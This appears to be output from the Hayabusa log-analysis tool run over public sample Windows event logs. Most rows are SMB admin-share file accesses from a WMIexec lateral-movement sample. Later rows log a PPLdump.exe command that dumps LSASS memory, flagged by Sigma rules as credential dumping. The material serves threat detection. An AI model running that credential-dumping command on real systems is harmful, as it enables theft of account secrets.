SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc | IP Addr: 
10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474 | IP 
Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4 | 
IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc 
| IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d | IP 
Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4 | IP Addr: 10.23.23.9 | 
LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Documents | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\desktop.ini | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\SMB exec.evtx | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 
+09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 
0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x18b247,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: PPLdump.exe -v lsass lsass.dmp | Process: C:\Users\IEUser\Desktop\PPLdump.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xbce3a | PID: 6316 | PGUID: 747F3D96-F415-6081-0000-001040FE4900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:25.417 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 652 | Tgt PGUID: 
747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:25.418 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1000 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 652 | Tgt PGUID: 747F3D96-6E19-6082-0000-001070650000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:25.427 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1400 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 592 | Tgt PGUID: 747F3D96-6E19-6082-0000-0010885D0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: PPLdump.exe -v lsass lsass.dmp | LID: 0x3e7 | PID: 7188 | PGUID: 747F3D96-F416-6081-0000-001033034A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent 
Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.083 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: c:\Users\IEUser\Desktop\PPLdump.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x103801 | Src PID: 6316 | Src PGUID: 747F3D96-F415-6081-0000-001040FE4900 | Tgt PID: 7188 | Tgt PGUID: 747F3D96-F416-6081-0000-001033034A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.084 